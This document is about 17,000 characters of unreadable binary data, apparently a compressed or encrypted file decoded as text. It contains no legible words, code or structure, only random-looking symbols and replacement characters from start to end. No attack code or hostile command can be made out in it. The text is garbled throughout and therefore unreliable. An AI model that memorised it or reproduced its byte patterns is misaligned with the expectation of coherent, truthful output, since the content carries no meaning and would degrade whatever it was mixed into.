k��}ֺ��:h{OsNna<�V*�\O[eo@쒦a4��?��ɩ�~�r>8�;�/����Y�}y����DG���E����"	e�r�Z�+�4�m$�)�|a{�Y*: ��l��Vqc��2�\�)W̨5�@�FY�ӡV��f}�zي9�9Y�F�Y�C8t~@B$��G7_����'^�*m��37��!�@�p%%��))��_��ꛊ<�.���v���O^�kA�
�7Uї��yH�/o���D�Pj0|#U���	�b��^�=z���0�O"�%5�BP��W�p��мV)�fu���_�>�_���/`���+W4��Q&~0@��s��\�~%��v��U}A���М,�����p���44��iC��R�$�ƻ$��у���ѽ��{�f��>�������8���M�7���z��lF!
��.�D~f���2i�\������~V��R�j��r�@lV��3��EV�*:��3��L��?��Q���e�R�*�8_�"��K���T�iT����P�2�$+wYVʗ+=x�8ʎ��8��\۾O�C.z��a�?VrMT�V��Xa6��2�M����eǵ~Ӏw���5��v�r�s��W�Ӈ�#��̈�&�xd3<���d 3�%%�I%�x0�<S&����%38�a^��|Q-.D\?�.�_�pcM��L����m�}�I&	���M�[`�H��Ĝu�F�ޒ1ÜL[���K�`c��qz���i�����K��ύ�hK��il��e�/�Gc���&=U��g(�s�
	r�l1T˫%nH�\ޣ�O�$xnH���n��\`U���|�
6\��<��i8���8�=��!O��̭�(��?�1����<b��:��~��Y_�p����
��,�sL-!��i�8��̜d/z�=�g�c�ӐTsHC�?��������⨟�C8`>i.cdl��
�̨v�I��.�m���+��A<��5��VlHgW�������Ҧw?ҽ~GHOF`ﶸc�N��e��k��hR�=�xo�ְ�sR�x�#��+�3e_��_z5üX��
I�y�<�����C���U�j+�"��EdΏn�컄�[��m��RY��b�_ט���1`H��f^��£i2���3Gh﯎匀
�M�%�]N]�g�3��(�)�Ew�'�;��Ji��AC�_��B�Oaփ�s��s��$0?�G���qs�J��v4tw~��Æ��*z����lV�6�����v�$��"p�4��.b�K�jfp�t��<�.k狑m�>�W�i}�����b8�YLˏ��a���6��f�%�!Ec��z�l�;�y�|@�j5��^l�$)9F�3֙'�{�|��
�x`�[j�s���t���Y��%i��c�ݢUW��!뫦�r��&��E�1D��kZ�K�~5Qʼn�´՛��F66�����5�ɦךu[����!�?��pwM���e�>��S	�q�˜ڥLI1Xap�ZV�`n�c�Q�2�'"��:b#u��gC=0��i�Ew֩mo���9JV�]�� i��YZ��wb�^:.�#�НNj�sV���U{}
��%2�>�<�v�K0r��x~�—�J��bm|�8��wj�
��=��q�ro��͔�����륊11���t`K:�y���q��.z�n�G*/�vk�h�1�����j4A�.
U�4j�/����\���&��q�V(d�!��/��������ԓZ&��4�o�Bd�)��;s#q��Hq�U���
���qB���{q3y��?Kӈ��
,N% �jn^DŽ��ܧF+�+INU���ݜE��]�����!����z��A���h�~�[}G�e����
��d	�B)M%w �m�n��x�Ҁ;	|�5�FW˶Y��ʋ�I�8�X4tł-�"��w�m$핊����W���T�"�0 `�1T�m03����)�X�Ü$�Щ�w����F��C��3�V�k^�kVf��g��.R�.UFM�+�Ed��>�9���t4ì���g-����i���Ɂa�%��O��{��5�pp�_��;�TN���}�f���٤ټ�݈	�+�f�q�+(��!=j��F4��6�إXs7���]���c��r�L�-�g�m�L"&�t�4]�cj|N�6EI'�j$Z��� =L�w3��;	�{��Zo��I�����9�!�.Nk��u�md��C��.F1GFP�5k���.�lVG;�L!�c+%��.�6�[�7'B\W ijGV��E��e�~�.6_��2��C����g ��&��	M��gm��Po����:Fƥ����d�4P�J?��eܫ{����<�.:� �/7iOD�6tP�E�=#�p'	S>d��4���F=ދ�3�m�w�U.� ��Q�B9*�dZA��^�~q-�/� �JU%s���`���2�6WT�;VL����.oы�DPb7�ʥV[��(ݏ��v/�$;9�1k��D&������_��V���q��t��)	�-r�U��;ں�VF�e�zA���!�S��^ʠ����:z�3>Q�l˴ڪ!	�A�@�&=�������ȗ�E��.ø��/0�Λ����2c��!<���n�X*`o��"��;�A������5���<����-�y�򃥤��A���YY*�o`he���'�ԂW,�0d��/�0�����~�eI�� xX�ć��1��S�0_���˞�=/Ί���7M���~��i/,'�6�5<\QHb/�ƤYZ/���N��z�wJ�}��ǵ3��Nf���Fz,bx?��y�uܤ%Oh§�\�5�ޣ�ɾ+�b��0M�_,?��*����Y�I_�\x�(��9y$��e󡶙�n�l�WQ�V����<��4�|}=�鱒/�F�(4eZ?�*��Q�̗j�Qc�X��~��P���a���Jw��
�G� F;�5�GJ(UP�|�ьP�$�*	���Yr�2�e��
����r����w��E��B�;�\Fm'�Ys���:�R<�NȭY ��;�>R��0�6V���ֶ�Y;3'�4�d�Y}纙V}�_�!�&4AӼi
��\`��]E�H�k3���)db�r�''���a�Ћ�]�����b���09��x��,f� >��j("����YV,��'�&�L8�[DJ9����+���8^�V#�e<�X���J��`<�<��wD..��4�)�@s�ν?˪�����a>%��]Hɣ<�b�><T~a!���	�2�����^�]�^SՏs�wҩ�j�L�Z�*@�Ȼ�8At|��C�Ej���OpQT��O_��!�7S5�Ј�b�D,��>���EXȬ�N��NjC�U��Z���L,�2�nz�j.gJI@����B�.q[e�X2��*�f𿬞�D�Z� RF�� �/�/���B���xOX<K�D���Hk3��8��[�Ċ��H�ׯK���[J�`�.s�:2�F���7�b�?ೋo���d.���#�6e��S��9�v��5�茚�U�bqV���eVm;؀8��kA�D�l��ഀ�GbEN��pW>�6��p���b�w�v/ѐ��d�ܶ|�]�!�/�?��t{�636�
_���\�e���f��&!kiy̡Pgj��XHu�׌��G�� �D��А9I1"
�A� �s	�H�X`�O^���k��?��M .Z+�q�V��e�g��yM��В|�o1w/"��n���7N��XH�x��d8*��$�`<l�ϛ����t�����~dk�\��T�=!k�8��:YO���B���r���<y[�:�%WI�_
��E�)�6p��T�a��:��/��K���qQ��9h\&_�Ig��Ƅ�cM�>gK*Z��M2,�G�h4���.�o��?O���Lf�߉GP�Q�����=�$z�c�+�������W�DJ�
	8������81"Ci1P��-�/���HbE�X=�Б�s��"��;��%���GIv�����du�Dl��I�^�1�<���1
��v�^<:co���$��,�<�Q��!m�X͵+�G�5��-�@3队�ڬG�s�V���`�T�3��Y>�����L{�A�
��KӋ�!m�g��<+A8<^9����a0/_.n���vaoW�/�r|�Ǣ�C��IZ�~�y�����D��$|ƒ��UA_
��ם@Y0pRc���3f��}�jI��@�k~.�_fO�0_�^S4h�I��֫xu~�D�p�?10ӎ��B�E���eZ�ޗ����02�Gc`�wCYZU���B�iuG2ߨ��J8��[=
ѕI�K.�ۢ~֒]k&�Dp��X��9i�N���F4,p���] �NBԸ��x���<�+J�����] �E\��J�y�>�#�i����X�>Y��um�2T�ar1�3�T�$�KtRj�)�73��9S'(1]���Um�ɒ�u[e����Y�\v�۴����t!ӆ��ޮ��iu�@����6�Ǫ�}�A���=�[��}K�Q�T��Wn�b���;T�e1 ��&��Lfv*\�(`�;�ӻ�;4^�v�!�/sUW#��q~J(��|�q����)ʱ1�˚ᭈ<���@*fLޜ�iD�b?�
�
���u{3��TX�M=51hG��u\JZ0�^������Qjy=���񃰱V"=^�:We>�Tڗe�U@^_qdLZ�ѯ�Ώ��c��Kɵ���/�=ɴ��&�
R��KT��+�~���@������!a�$dKFn���O�
m��	�t-G�
�9��F�5膴mL���Qm�q���ot6;n�|��J5�G]����.A��-��c�,��A�"��j��Y���.o	S�,[��h��c�.[�k�^�?��O>���_������LC��04�E�R+u�P�p�5�Ѩ1`KҀ���W��u
�O�G�H�*��y����Z�M牰<�wO�-����4�rk��[=�Dǿ�%j!m6�J�(�'5:���p'6/u�E��Ν����9��T��>�g҃RJ4�D��ߌ`��KIn�[�-#���/H��;��q���c&�m�]0��x�S�r�g�mh��f���D)�A�$�5sv�4lu28��T9�
�ʿ&X�|}vi�um�(����H����5�XjEdr���_����dھ�ݟ���lw��qR�q%p�86M��M<���dHM��)��o�r��Ӷ<6y�^6�p���v"���Z��z�wt�����L���W���Y�Qiqc����4�~�7@�g`��Rݹ҆:q�� ��Ȑe���sa�W��qʪJ5V�_:^QJo3�5�=�!��>=�w��<���}�8�� .�!��$�|T��Y"j!O�֣�ߚ���.��V�r=�J���*�!sKa���c\A�LSV�\\��>:I�N��&ʹ�A$���v,;�N�#�+X������3$I����FC^�F�t ��>`�zI����fzJX7�9m�"O�肰E���Z��������$�ȓ��*ߎQ�V�`��ni����&����&���<S�=��@%mr��Y��k$���B���H��ޠf���,>(������<8
�����Tt���
��i��p�?���A����J!���!ݪ��rM��Tg�4\�������WYR�;Q<J0tg�G2DT���?e6Η8*�YRΛ(	 z^�B�J�hc1,�i�$+G�?za0+�D�a�"kćje��ϲ�w�`�_<2E*~���3��d�p���-:�J�͏��fćt)�
0������|o��i^A/n#=�_�
�j�v��F]kg�E�
Lb6A=;�l�_
�K�fÚ�Ym۶5(�l�غ4��N\�֛�\��?fp&d1�EqѨlAF��:�l��^����*�Q�%Cw��O��M7���m�X��T^^4�폫��h�����F��#�������qQ�~%5�8JA�|����p�,�3�ZUڌv���'��Mq�i�%Y�q4t�+�̈ď���b�%8�At�s	�O���P��S`�QR9��k7�VU���=M���N*���}dN�A0��U"�eC��H"�Kj���`��a�]8NiBSa��S9H�]H�]'u�/�����v�h���
:�/:���P��oI�ʩ��M)�
9U����t'�B�¤�M�e��Ѭ�$r ����Z���ϛ�)�M�Ӷ,,�١cx����v�N��K>B�S H�jt��E�>>R�xԌ���
�z��qְ���p��S�ds��N��uh	��.�C�gI��v
���)C#p����,�5aZ�Tzw|DMl*
�s|�"1�(*<p <n$K�
�˴������05\wE1il'[uR=�jS���ar%Ci�rM�ȷ���o���:����V�s�7�Y��Y�&^���[	ǻ~��DO�+��f�!V�t|�~28�l�B7R��Η�������Y�Lh�t=v��~)W��oT�@X�qM$��刅^l�)c��z��Q�A�b�Hv�0���.[�������R'?i��s~V��{sߣY�uB�7֍��D���3΅܇��\f�Yj�}x��6mG���颸
��������aǓ��K)3H<�-�Fa��17�~po�w��^{�$�L�o�}6�gm<�¬�������g�f�H��
mĹ����h������!�S��t}�S�Dج=���Q��J�UA���`�z��31�%7�`��������`��,��`������&_O\���ITH-�E���o<���ge@�s?���j�|G�TG��j�Ӗ���J
�F�$+��,W�Gt0����:\H+�
�BaQ$���Ҏ$��Fd�T�ݍ�Q���g��By�(��;F�HC�w�-���\SW2��	�5ex��B
?}8l�_�l,�L��Uݮ4^h./���=(!F�O�K
4������Z3�)�U9��cap�1Di%�V�/
N��$����E�}GE_������Ѓ��p`�@Yx�\�I3A�6�D�3O�3�6pcE1E$8�&2`k��_$� ��̕o��b�����Q�x�V�T(;
�Dk�jar���F�D���G���#z58z���
����,�r~�5��bqLGM����������^sE� _�3�u5��'�-�}�^kё�#�8�m-*^��M���S�yֶ��2�$�	�J�z�GrW�YM鄈�������3+:�]�^0T���e:b�����5��1��.�P�:6�<�;W��m�d�l��`m��7�K^u�a8*�=��5��d=�PZ��oV�X�w)���"ѪH[�~��b�Ql�ʂ%j��Z���儅��t2��f��Ӿ�A|�JG(
�0�=���Z^�K�</��I�\fBSҨ�+T�����6*%�4P��d�%�=,�8��;�@�r�j�8<���{�O����F�]��5
��d"�
��+�I�}�Ǥ7o���Q���a�q��t�=�HD�8&f%w�J�B�X5��'�\��2�5�ek��Ǻ���K'秳/�Ө�|��z$/�g���]���g�[��-uG�L-?���5WO�w��u*��u\�p�h��'κ�8~���� �g=���]�_Լ�3,XOg��e�s.3%�?�$�TJK���o�F���`��L����T�(��Rd�A��Jl��Ҍ
�k�J���U�5q�.\/pGB�0�����2�c�m�j��+-pٮ���U~�~��O!I����%d�%��ٗ�I�=��sm��v� �KtO��!�C��,ד��ԪuY%#�F�,Ikv���6������2�0S�
�GW/��C��(�YܲY���0e�D{_�^vMKF{ÏU�]���I�r�70%5�*)�������R��"���v9���i�OA������D7�>вG�7I{<�����wd��'�ܩt���;�V3���o���Y��W=��.�"����Л���@����mӺ�p�M0�#}�Yt3��<��F��M��r�R���{�tkQږ�mn�p������W�@����p!�_>0����a{�O��aΏ�)��j?$��1#��ĕ)�v����"<�t;�E��/��;@���4�^�����OHØ��X?����^�H�v_�|t��Z�!�2�J��HD�XɮrD�<�f�R*�fA��1L��ma�����0��K]]G%�3���9-���/#�jQ/�h[RsVyC��B 
BR�e���|/��h�k�x�5^e
����̡ƚ�m���h�&	(��H�T"])�DYjq��Za�3$Z��]��g��δ���a�^<�.{�B�@{/V%�<,\�ÿ�q�;��Q)�c�N��s/��	���	������/�ހ��W�U��;2,�׊͛Y'�jg�{�"c`F���e�k8mYw��ڻj�|똢���V��|w2�~{��jW���Q['P`��R	b�(���B�&�S�2H���ެԐR�M��<0�}q���F�Jt	�i[A�b����L@C-�E/�@������"T��-�D7V���|V���h>��\�E�����N��+%��ըh�]�͆�N��(���~�sy	kX�<����Zz����:y�L��=�"�*MBkP.�C��+�.,�+�4�����Ŝ��?�R�+f�S�j�g�PJ3�b��Ei�r.�e�yI���L��RF�KM���w19��bh+�T��F&�T~*��C
�ED��<���p�I�Q�&N��,9��a��Yj�"����!fJ�FJ�-�/V&λ�iJ���Rb�����20����2 5�~e�6��PO>����oy(:o�R�OsC;*gP������Ӻ� j�e������
$�w^m�o�N-'��1�V���4l�ވ'�O�δ����#���:�`����H�Ώa���Ì������v
�K�:7�^ƪ�~_T�+0\�_뮶;v,����f����l�'#y�ؕ��gz@8�?k��؛p>�ܺ�ok;'�dk���N��%X��
���0�`U�Y)p*8��(��׃Q��R�U{@ R�5Fҝ���35_m�r)��wv>��8���j��і7���&�UĽ��h�N�Q+�E}Ư�mʛf5�/�lҽa�s�[�v��eM@������u:���~��xP4ö���K!������{�J��T����%���>Gy�~ؼ��;�\��`�>-�g!��$�#cF��qÀ-��3\Tj
�e�~�����DR�*��p,ҵ�H�	�[oZ�@�qV7�>���3~�o%ӵ���0�'�v�
o&6l�BRж*l+d�U-�E[��~v��>�]=x{)s��Aѣ����S�jr��L���%��E���?�u�`������As�C�v��5rA�E�y;���a����M8ɋ�������Ŧg������9GhK���j�ܷ����Z���ƻ�g��O�&7��Ѻ�mL�'��Nz��ʦ7�M3}�a�c�[�P'B!^K��(����d�^�R<�4��
B����<T_B���juU_O���H�`� �r�:%!:��$��!W��7�˜/ٸ����V.�����]�����a���z��yRJV�m�lP'Ѷ
��V%�jT%�h:Ƥ��Ẋ �GC��ۈҧ,^k�6+�j����;�L�İ�k��l��n8���U�����b��1����� k���aWPÍ�ε?!����g�GXU�q뎗���)��r�U���3�q��,eD��5NNnL'���@-�e.@Hul800���9��Շ+
�S��I��+*�(�.�/���@���x�@0�0��Là�mܨ�RA~�u����kLX�|����|*ޕ�a-w���MġX�=5�P���;��u}U�_�i�&��$fT6�]g(��Aj����`q>�� �0B�MIu��	3�n���3&�`�w<���
�X�z�$�(�}ǫ�&�i�U�L�;F^���5�J
�	Xݓ�ꡓ���4��XJEj6�?9}O����TE�%`.^"��5Ym%�n��+��}4#	�c����z��?�M�~��;�8/��Z���}6����5��݉@�V���)�/���	�0M\�8Cn�KlQ�%R�����!&�L%�8���eH^��LC2I��tHa%[�"��}����p����� mU���`��[y�q���;����\UA �0�dS0?�� !�H'u�%��v�ZͫV�0kzo�f�3
"�m5"��汝�]!�/���1n���WYN��+�¸��A
X.^[���5��1�Y8�cRݟ�c=]��az/�EF�7W��:��/2�8�8��6�~�<��-gmw��
]�m�R�h�R	.J�}m}�����#yΩ���̓����F��
��|"�$s�f����z�]=��Aݥ�\��k����=A��{�[�Pו㽌��RKڶ�f���}7��>�V�w�@Ah���Z�y�797�MX����Q�VS/'���*L�PŃ��P��X�(�4A{��Y+�����Zώ��b%lk޾F�f�^f���x�y��֋啰�T$��˻�U�����C��7�Y&��n�Md}BFm��6�>H�����Tַz*�Nb%b(1�	�e�� �*�'qop7��٦���n���p��z��*d�/f<I�*�����54��m\�Y�&#M�0JV7G(5Q��Q�E߸پ	�W(�R�y���B.N�����J/�4vgޫ@�1���Pp�X�,]�AH�g\�<�4骔��^}��zs�\�/�K�e�`��a
2���_x�#��p��-".��+��14�*�Q�}��a�Aq�0ʺb!�SF���к2�[�:E�HKJ�^�������G-��
bv|�]l�L������װu��+<O�>+��$~���?�ַ�������H'�L�k���qf����0��B4�/8�ԋ1p�f�<2<�AF����X%��1���{��0(��r/�MXDJ[D�
n��q���N�A
~-��Eh֔�ZnYYj���$T�\�{���KU�Mգ�= �l�
A�W��u{7z���{�X��D��E�4��L���_\��UW	T�S|"������p11��kF��ʰ�U�ك��^��F�5Tz��<lE�Nq渙׵c��I���+U/Ge���{�I�a��Z�a��;��k֝ϴD�N�*,ںj�4r<s��_n��q�˚��]|B�$��tnm�ʬ�;���dP�l��v%Y��
IST�4���%�m^�6_�ֺ��;����P�I��C��A$���Tn�F�.І6=�G1)b肑�m�����&�=���L�c9h8�9�;���{^�.����_5=ys�ub��Y�~a�d�3�]��sֹ�x��tQ����D*�p��
>'Fcj �T�hR�8-'F��3iQ�(ɚr�b���&Y�
N�JG{H�r�4�U/�rK}�t���\�h�?t��O�܋1&�z%0�n�9��ti���A�d�^���p��۰Tw7�E�!d�o������`�y�b�8�~��$;�%!�=V�C)��SU��,�(�B[5$f�yF�El���3�b4���T��䋍���]%E����������FoZ&��g�����Γy$>>�ض�ʖ���#�ي���r���?�6��!�״#��)�le��A�Z�a��{��u��?�x��ð���>�Kwv�q���?��m���ڵ6/�������iw�B-a�F�rz+��	h�=UM'��E�0�
ɋ]�$����h�w�(�b}@��La�R#�t�~^�!s&��LJ�:����k��#
���.�dN��ﲪ�8�(��:�2Y�"w�c8mf0VxF^������>�x���|�d�V3�C�I�5�g*��B�F�$e+�#���p�*��C���$�b�͓�z(�V�'}��5�.�%kmc�L\�n�>��_e�x4���yşbt
Mh/�q�3.9��)]�p�m��V�N:���JZ�v�Z���*r�Ǎ!L��E�)��!�gī����&x�6��4�I�����
��˒�	3�(p�'�Iʓ�z�1�h�4��X=�A���v>̩�!Ua2�>)�7L���zR�^Q&m�WF]_�Aj�L;lc�.28����Ɗ��������x<F�¹j�<}���p	A0�A�\�$c��l��Az��-�.�A5�]�2B�Z}�3����8n���پ#�K0�P\�#�!�x�������DpՎh7c��D�0�J�E�����గy��}2�\�ݸ!���g��%X��25F��6��q ڊGD����k���
6���~�N��I�[�_j�{��=V-��{mmf$A��`_ovl��I��1G�f��:�W;����)u���,ֱ�*�G��V؝�E��s��8�)n�.�X�]�bݭ��Ogx#��*�G��Gϣ��f\�م�52s#�¾w<��•vh�k=��b%V�QpaHs����h����c����a�(�X���N$���օ��I�^э�%��b�g,VG��,�h
I/3k���&�G�[�-�mv�;T�m���~Q�U�@֏h=7��
y,�C�S�:!��N���id�_��yǧ�`H����$�����"�ȔqB��&'�8��=��O�D��G
m��Ps�G�Fd��r�/c
ȽZL⯙�y��~����wX\kd2V۵~K�T�1����Пw ��L��Y�!T�:��Iv�ӣ�o?�qh2ghV�%`�2c30�=�nT�嗔O�dV��wЏ��}���ʛ�	N��A���V�'!r�j�7û����z���x:�P��J•��W�B��cDp��2�������~ R4_�U!�I`���� R�X �W��+^����B�����8�FJ
Y�9${Z}r�dpqs��[3~_�����|JQ�@���D0m������_�h�!>|S�z���:s�؞�n��?�;�%CO֪�;��
�H3؞o�o����w��"M�4�3��e��7�s�����\�"�ϺD��=0�!ŀ'J�����2�T��/1S!%�7�Ո�����ouk����Zӗ��x���g�M�z�2�Rj��]�Q����o�D��!5��i&Z%��>U�]G?�|hm�)l���ƾR��	PN�ݰ�=��O��j|3�PU�+�9�No�WHr��}JdIJط�>$��(v�l&|�~GN��咔�*���x�셿��R�fR�{��H���(|.���xx��@��$|K��1��9���Z[�@{}r��]W�A��}������־��[�t�;^�����:��n�Wo�E���;��ˑOt��Ô����'ul�5/�e-;��y||�{��f!�ϱ���wv �^$,,W��
���(�!�=I���Pl�}8��h_��VFay2z�\���)Y���l�}4���\���<9čj���qR+���B$x�OC��Vh*�-aGء���)�PS��Ḣ.���{VU��>�|c����9���y�1�itݎ"}�de&
8X܅� ���J��kjω�!��a���g�����0XU��@pW��@]�k���խ��O���X�c�A��\�?8����H���-6�6H�`����e4s����a+�J|Iq���m�7#�k��	*�
�-E�J��rB�Z��]����E9��{�wq�1'`��M�V�n�T���q��oF�K�m�|���^�lpl\+���=��(lS��$�S�M������_�|�`���UZR3r�!1�rF�TK<����̢��V47b A���t��gB�5�J��IR6����T\}��t�C��h�$G����\�*
����	O�mTF">Š�hH	e�5���Ĝ���F�b���H&��oi=�lI��H�a��ߌ�+o���+����
?1r�D���"
��ƒ��}�)
LF1�+����5�?� a�;�E�cd��í��v��,9ϼ,���<-4�F�5�� #�9Ze��W������[�����oQ�.�� ^��3��dR�<����X���ռ�X.$`aؿg�#��L/d���B�:��Bި��l&<��q��mH���!�_6Ư���{���Z,#�`�%Ǚ�
�D�)��U���#��SM��=��{� A�KQ�Ń}���#h���uT�2U�RMr���q�j���8<��~��8E��O��;��S`�v�(�Δ�A"����[���G��2IK�JIF3�"�v��J����4ի���~%�qsY;-��sQ�V
"I�8-�.�솭��9]���C�dx��̵��^�38~�"o�L�삄�����8�F�C����g��xmV�*$��]�V�Ԉ��z���5���׆���mv	v�?�X&״�k�]�	����?(��HQ��n$8!�(��q�2<���P��+��c���0���T[��'Xkך�L>m��z�1b�;��ҫ��β �Aá��U�R��M�f|�H�j� ze�S�Ddaw��#;����_��V��H�E@�uX�>1���&{�Jm�������_��e��M�W5��j6n3�8��Ł�Ɋj�ᠼ\⨓�z���U+�f!���[��w��q���`�z�_�t�\�a,Z��k��X�Tഥ3�Y�bXs���W|.dž��~ŦtV���ع�7Az`�ys�l��g(Ri�P�jt�}�3�+�G���1reM\�}���;2`�Nm�k�]Y��G�u��K�d!b�1�2[��h6n?X0j�J F~�ī��w8֨#���'6Д,$�w�F�.~jGQ�BG�y��������2�D~
V����K�P'��>��XXD���n� �X�H�^H;0�-1�;_J�|~�E��{)��YRi�[Um�9�󌔼Z��gI��E�}7�bpK��jt��i�̧}���ё|s_��6|��9��)k$'8].G���Ȱ�v����t	b��4�S�O]T^\sUe�d���I���
}B%�1�B�,��`�#ަL�؁��ak�\�b���f��?����q���`�(/��)-m�M�?i��NJ�Q��p?�q~������D�ǫxMՠL_�%+pxC�/-��#�&c5t�<�l�C|UӅ*�?�O�b(v8;{�P�{�yol����naYt�;�5ܺv4<� ��'��z���
�zVN;35�����Z�P.��4����[{�w�����&�P0w�)��6Oe:�k�+�0a7�<)��fdQE�z��kX�QP�T��>OH�񪪴I�9�Җ21�#%GA����h��7������+�T�0�_d�ML�o��@�u���b��/^�i=n�v��	Y�SWd%��l���(�Ƿ��z��+���A� 3�f�5�<mS�|�jp#\�{�_��){��ئcU���֩�v�I���_i���O��1?Ji�B���r����۾�O���בy	����\'ˢ9�(J�`۟i�W?Gv�
�	v0n�ik�;9gU�a}mm���/����E��
m�vd�z>m6i6+�""[�ݹ�	��G}ڬ�2��/iN�j��@�AE�d�t3b2�^�1���/ѰH�
{���Y��և�+]Ǘ�9di;��J�|d^O>uX|?�t�|'22qM�:� �7w+.�1�z
��Y�`8���n���+�߲ol���V���el�����CDY�/�1�>�S%c�u��M����$X=�7��D���o�.�OV2���N�ZS�����8��6i�ݟ9������q��{�7U�d������/"����	�^���^��jn帣�������~��0冫���GҚx�s^�a�����Y�5f+JG��O|p�Qh�P�w�9&���>�e�ʛ�P�$�މ��Ÿ]��HJ��݌8��e�����
�n�2��Udʥ���������3_��gD˓�x-�.��#u*�|�
K�����2�)b��f�^����']��E�},��hc�L'�֬��
̨`F]�g��ⅺA������ʻ��E��^�z8Fϰ�.|6*�J_�%�py�Y�/��7�6C�oa���%��s��<T�%]���`^�|o�c��Z~�`�R���3�
�/�=�!-���< �<\��z~�]Q� (�����#N?��=��a�
�
waU��`T��sa�lOZ%�ӀI��u���Z�B�S'����;��p���wc����
~]Q��J®z��F����%�;dxf ��=�.�j$���=n7�;�t�K�Z�S�GG��m��!D��$�0��f�Aؙ��8�ҝ\�%��u�$�{�
'����N?��'��:�ҹGX.��r>kC��.��]T�/z�N�{�Ѱ><�9w���l����e�ee)�y�&%�y�42}�)Sr�В��`��k�M%�T^�����ه��K�/�ŵY?u�:m[�B˚i�yS#%�e"Lzz,~,[���i/O#O)�#m����̽��6�RHC�f�
C3�,���H#3������MPG&�ռ�1�x(�t3p��r�1��)A�V�B�����a�;�\�j�pL6�Ͱ�):���W����K%�˥E�� nfu}��#ofW�g���Йf�qQ+�w���8�vkJ��_�k�[��e���\3�	�`y:����&
����j�~�J}5/��b^:r�eNk�>�_{Ϣ�Adִg�b5S�r+{�G�όݾ0��Z�B�r��}~��E���.=�^��RI�,_�7{�4g��{�����
{�����Q�As����^+���5s�����νj����rH�}X�B[	����rh38�	<�J����6��?��5<I�k&�X�>)5����ȃ�~�1���S�`�JB
�>�z����Ʋ�)yk���
/�Z;^�Ƿ�Q|�>���S�������p�C>����v�6}K/ӱ}[���U�]����E^59��䇙\�VG��D���zG���`��/jl��;�/y��瓴Uѿ�s5i�~�c��^�`��P�K���{0(0��T�ţ�2I�ܨ5�`9�b\AU݆])u����b����f�Nt�2�/c:�DBMr20�+�cb�?2,���h����r8�c��_a2��7�Y���$�ɚ�%/�욉��3ΊƐF�ǨB���[�
7�䭇�ʺ 2�խ؞?t�8�_4��NR���Ji�hv
�W�g�
����Da�xo�����j� ��d��9�2N���_u�:�6�O�^�v��@y�A�L�w��Q)b9��zF-��h�mD�o�nҽ�E'��p}���?�	��}u�fW���X�0��/��8
�{D�]o�Ƙ���/�}ݔ�~�!��&О��\��&��%_�R�$=gc���#SB?p����$׵>�,�6�W�
�1^U�Ļ�>���W'v���~��� C�@y:�0��oT�#��]N�i���v�n�p�7\�n=�+`�w�c"d>vOC!��1x�{s������!�I���h�)�؍��Zš�g�e���?�1��hVޕ��XMi�sf;j\�M�S�^+snX�.�eef�
�vaWLj�j��0�i���wۗ�_j���,��<G����>�p
|J�c�|�	�b�u�|<Eڭ��W|Nd}�*J}��
&q�G�	Ĉ�� )J j߁o�3-��?�daŜ�Ӳ��Zn�G˵E��粆e�a@8,��.��o^�d����v�f�"v׵߽�m�{"�tx�ʉ��Y�J����"`OlΖ���L4֨�[��R���1�_L�}�
�J�[�hخ��$kU��#���R�n��218��M���
��i�1>G)d�p�t(zՂZHT���2�N�j���~
|��g���p�$P�b!����8z�!�;�� �E'	�-lAd�~���:��ȗ��dK��g=o�ST0�!�y[��^
�P����5k���eC��ʰc0��>�x����Nf���LM�%�s�.��l�n���ӱQ������T�&3�,����ZZp�ەە��=�bmb��w�v	-Ш��@��Rk/�3ONKF��<l[�~�T��Fe�5�UI!�ż�jnp�`�7�#��&�o�d�m��`���Ր�C�7AMQ�LۅCMu�\e��ݖ��T�p��G����
���&#e�p��T;K �J�C�l�������63�EBcs�./�
�ؿ���+J��.�fj
!s6s�[g�V+�{��B#�ߍZ><
���??�Y�ڳ��@<��J%�z;����Ot�`-bmY��x��WB��4�5�2S���[k#�Y����Z� {�K�V�E�V����_l�w5PC#E�yɒJ˂䭉y$�[0�)p&��p�Л�o0O�.���lmmݳQ"�C�d��|�k,��jxi�hHfT�p�y�n��x=�lf�E���c�u��ڽ����9��Z�P:���v��"��~�m��OÆS�"\�Q�ⴚ�~Ov�F�>Q�s��[g?nĢ��~��G㙞f�a�����0����v#9��ҋU���
������Y��هj�ᖮ�(}���5����ۍ-P����5O��a����>�ʖ"����2�v83�[���'�16:�u�~�G6��B�e�W���<�	�������bo;�7::\���3�X���%6#TRd[ՙ���9
׃	�\VR��߾.`�+�^`�:(/����P���Y��J���2_��R8PU3h���q��-�q�}G��g}��;X/?��? pn��Y\���'�k׊�������݀����Z[�(����K(� �VCb���S�D����@\�1&&X�.���D͒�Ĭ�S�f6�CU-x�RQ�����
 �� �ӿ���^�I�Y�zs�Z�-$v�.En��j�v0��Ļ���X�,#��+,/u���Ta�E����.�
x��y�Ss������Ys�!A�1b��
�F���D��q
���`l��9�I�R�E!��y�y�|��S=Y�a=�a.'��դs�R2w5|�m����������%��wX�W���lor�1I�6e�*���TzFH8>!���]},�B"k4�����bi��d'�:r-%�� B�\=Å�ب	�	�:B�tq�q�=Wj.GW3μyl���ȇ�=\�d�_��5����F��ͭ�_w5���U�	�'q���w�K����X��\m�'~ݍD��L��Xݵ��<(��n��ONH�>t�>�6z��ܵ6:�ȯ���p?��|x{�o�x:���a��/w��V5�"4D�'�eyAs���Ϻ��_f�	���R��x��Rhs:���/��|��Vlw� ۦ�Z5g��]�W��
�Զ��#D�	7��ԣtY#.jVr'�'\�dVk���|՛E�1�8l?4š�۹�oSS{�OCP�1�l}����.O״~8�Ƣ6ܝNͽ|�v"d���H),�)X�F����+�A����j�P7;#�^�)�}�hd�Z5bg���v��٥4�"�r��.�ᄪ�K�r2��~W�P� nn�����W_��{���+��!�d��e8);�&%�B����;f#6���"�� �k��b��Wu����
�	3������:����ܧ!�}��X	�\de֣�!u�S�Q���L��He�a��$,(:��uɈza�Z�Yt�o�a�U,�̝����B3`���w[�O�/.��������Jh��b�+2ҋ�ߓ����{��I�ү#B�LW�諸��,�Jo���M�2J��=2UB��c�hG��	^�Њ�H�HK���.�LR�c��,:��.��]���0�(`�[Z�ˇ
-r�GP��*�sC��ӷL���x�O{�~��3DC�'��6�
�"g���1��z���N��?5�u!���ɷh�zG-�\��0h�{Nk�+���qh��>A���ug1�O��֧*���j�n�O��n��.cm�5\ӷ[�-��VD7��&�60r�<�2F���3�^���	��N���y�
>��z��+c���d�O]��� �qn�^cG��a���h~����5���f%H�&�m�u}U��qv�2yh���p�F��b��
